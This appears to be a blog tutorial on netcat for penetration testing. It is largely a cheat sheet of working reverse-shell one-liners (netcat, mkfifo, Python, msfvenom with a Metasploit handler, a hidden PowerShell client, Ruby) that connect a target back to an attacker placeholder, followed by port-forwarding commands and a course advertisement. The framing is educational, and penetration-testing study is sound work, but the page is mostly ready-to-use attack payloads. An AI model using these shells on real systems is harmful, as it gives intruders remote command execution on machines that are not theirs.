Ticker

6/recent/ticker-posts

NetCat For Penetration Testing | Quick Guide

 

In this article, we will learn how to use Netcat to get reverse shells from targeted machines.

Netcat, often called the "Swiss Army knife" of networking, is a simple but powerful command-line tool for reading and writing data across network connections. It can be used for a variety of tasks, including port scanning, transferring files, creating backdoors, and setting up network connections between machines.

Netcat is like a communication tool that lets two computers talk to each other over a network. You can use it to send or receive data between machines by specifying an IP address and port number. Think of it as a direct link between computers, where you can transfer text, files, or commands from one machine to another.

A reverse shell is a type of remote shell where the target machine initiates the connection back to the attacker's machine, unlike a traditional shell where the attacker connects to the target. This technique is often used in penetration testing to bypass firewalls or network restrictions because the outgoing connection is more likely to be allowed by the target machine’s firewall.

You may like to read more about  Introduction to Linux for Blue Teaming 

    What You’ll Learn in This Article

    • Using Netcat
    • Using Python
    • Using Msfvenom
    • Using Powershell
    • Using Ruby
    • Netcat Usages
    Using Netcat
    1. Netcat Simple Shell: 
    On the attacker’s machine
    nc -lvp 4444 
    On the target machine
    nc <attacker_IP> 4444 -e /bin/bash

     2. Netcat with mkfifo: 

    On the attacker’s machine

    nc -lvp 4444

    The target machine

    mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
    Using Python
    On the attacker’s machine{Python 2}
    nc -lvp 4444
    On the target machine code

    python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

    Use Python2, python as per  your system requirement 

    Using MSFvenom (Metasploit)
    Generate a payload:
    msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf

     On the attacker’s machine:

       msfconsole
       use exploit/multi/handler
       set payload linux/x86/shell_reverse_tcp
       set LHOST <attacker_IP>
       set LPORT 4444
       exploit
    On the target machine, run

       chmod +x shell.elf
       ./shell.elf

     Using PowerShell

    PowerShell One-Liner: On the attacker’s machine:
    nc -lvp 4444
    On the target machine:

    powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("<attacker_IP>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
    Using Ruby
    On the attacker’s machine:
     nc -lvp 4444
    On the target machine:
    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

    File Transfer 

    Netcat can be used to transfer the file across devices. Here we will create a scenario where we will transfer a file from a Windows system to a Kali Linux system. To send the file from Windows, we will use the following command. 

    nc -v -w 20 -p 8888 -l file.txt 

    UDP Mode

    Use Netcat in UDP mode for sending and receiving UDP packets. UDP is connectionless, making it suitable for applications like streaming media or DNS queries.
    nc -u -l -p <port>  //Listen

    nc -u <destination_ip> <port> //Send  

     Port Forwarding

    Incoming connections to the local port are redirected to the specified destination IP and port

    nc -l -p <local_port> -c "nc <destination_ip> <destination_port>"

    Port Redirection:

    Redirect incoming connections from one port to another locally. Netcat listens for connections on the local port and forwards them to the specified redirection port.

    nc -l -p <local_port> -c "nc -l <redirection_port>"

    this is the example of how to use Netcat to get a connection over any system using different requirements. there is number of ways that can help to get a shell using Netcat.

    How the Reverse Shell Works 

  • The attacker sets up Netcat to listen on a specific port.
  • The target machine initiates a connection back to the attacker’s machine.
  • The target machine sends its shell environment to the attacker, allowing the attacker to execute commands on the target machine as if they were sitting in front of it.

  • You may like to read more about Telnet For Penetration Testing | Quick Guide

    This information is helpful to you make sure to save bookmarks of our blog for more amazing content and join our Telegram channel to get the latest updates.
    Want to be a certified hacker and gain hands-on offensive hacking experience from zero to hero?

    Join Complete Offensive-Hacking Course Today To Get 10% Special Off